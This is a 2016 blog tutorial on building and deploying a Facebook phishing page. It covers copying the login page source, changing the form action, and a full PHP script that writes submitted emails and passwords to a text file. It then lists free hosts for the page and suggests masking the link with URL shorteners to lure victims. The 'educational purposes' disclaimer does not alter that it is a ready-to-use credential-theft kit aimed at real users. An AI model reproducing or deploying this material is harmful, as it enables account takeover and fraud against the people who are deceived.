April 2016

.


If you are new to hacking Facebook account using phishing pages, please first see How To Create A Facebook Phishing Page To Hack Any Facebook Account

And if you don't have the codes for the facebook phishing page, download them HERE before you proceed.

Setting Up Your Fake Facebook Login Page









Step:1 You will need to create an account on any of the free web hosting sites below and upload those two files, but this tutorial covers the process of setting it up on my3gb.com

www.110mb.com
www.ripway.com
www.superfreehost.info
www.freehostia.com
www.freeweb7.com
www.t35.com
www.my3gb.com
www.freewebhosting.com
www.xhosting.com
www.phpnet.us
www.freezoka.com

Step:2 Now go to www.my3gb.com and create an account and login.

Step:3 On the control panel, click on file manager.

step:4 Now click on the upload files button and upload the index.htm and account.php or hack.php (if you downloaded the script from the link above) files.

Step:5 In the link below, replace the text in red with your my3gb.com username.

http://www.your-my3gb-username.my3gb.com/index.htm






Now that is the link to your fake Facebook login page.
Once your victim opens that fake Facebook login page and attempts to login, his/her password and login email will be sent to you.


To See The Password:
Go to my3gb.com >> login >> control panel >> file manager, you will see a new file with the name usernames.txt.
Open it and see the password.

To get your victim to attempt logging in through your fake Facebook page, definitely you will have to make the link accessible/available to him/her.
It's now your job to device the best means in which you can make your victim to attempt logging to Facebook through your fake Facebook page. The two options i can make available to you is to send this link to him/her or you add the link to your website(if you have one).
To send the link, you will have to mask it by shortening it using either of this free URL shortening service:
www.goo.gl
www.tinyurl.com
www.bit.ly

To add the link to your website, you have to mask it with any label like "Login to Facebook", "Facebook", etc. 

Warning: Hacking is Illegal, this post is just for educational purposes.

From the tutorial above, i believe you noted that to avoid being a victim of Facebook hacking via phishing, you should only attempt logging into your Facebook account from  www.facebook.com or any official Facebook application on your mobile phone.

We'll appreciate your comments, suggestions and contributions, please drop them using the comment box.

For questions and assistance of high priority regarding this tutorial please see our Support Center


Hacking facebook account via phishing is no more a tedious task. For those who are a bit new to hacking facebook account with a facebook phishing page, this tutorial will give you a vivid explanation of facebook phishing pages and how to create one.

For the sake of those who are new to the term phishing, let me give a clear explanation of it and how it applies to Facebook.

According To Wikipedia;
"Phishing is an old method of e-mail fraud that is used to gather personal and financial information(s) from the recipients. Phishing is the act of attempting to acquire information(s) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. It's an example of social engineering technique."






How It Applies To Facebook
A hacker who wants to get your Facebook login details, will create a "fake facebook login page" exactly like the one on www.facebook.com , then he/she will device a means to get you to login to your facebook account through that "fake facebook login page". Then once you enter your login details and click on "login", your facebook password and login email will be sent to him.

How To Create A Facebook Phishing Page

Step:1 Visit www.facebook.com on your PC using mozilla firefox.
Logout if your logged-in, in order to get the login page.

Step:2 Right click on any blank area, and select "view source code".
                      
Step:3 A window will open which will contain the source code of the facebook login page. Now copy the whole code.

Step:4 Open a notepad and paste the code. Press CTRL+F to bring up the search box, type/search for "action".

Note: Action occurs  many time in the code, so you will have to search multiple times till you get it with the codes below.                    

action=" https://www.facebook.com/login.php?login_attempt=1 "

Step:5 Replace all the text in red with account.php. So it will look like this






          action="account.php"

Step:7 Now save the whole code with index.htm

Step:6 Open a new notepad, copy and paste the codes below and save it with   account.php.

<?php
header ('Location:http://www.google/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

That's it, you have successfully gotten the codes for a Facebook phishing page.
You will now have to upload those two codes "index.htm" and "account.php" to any (free) web hosting site for your "fake Facebook login page" to go live.

To do this see How To Set Up Your Facebook Phishing Page To Hack Any Facebook Account

If you found this tutorial difficult, you can download an already made phishing page code HERE.

Warning: Hacking is Illegal, this post is just for educational purposes.

We'll appreciate your comments, suggestions and contributions, please drop them using the comment box.

For questions and assistance of high priority regarding this tutorial please see our Support Center 

Contact Form

Name

Email *

Message *

Powered by Blogger.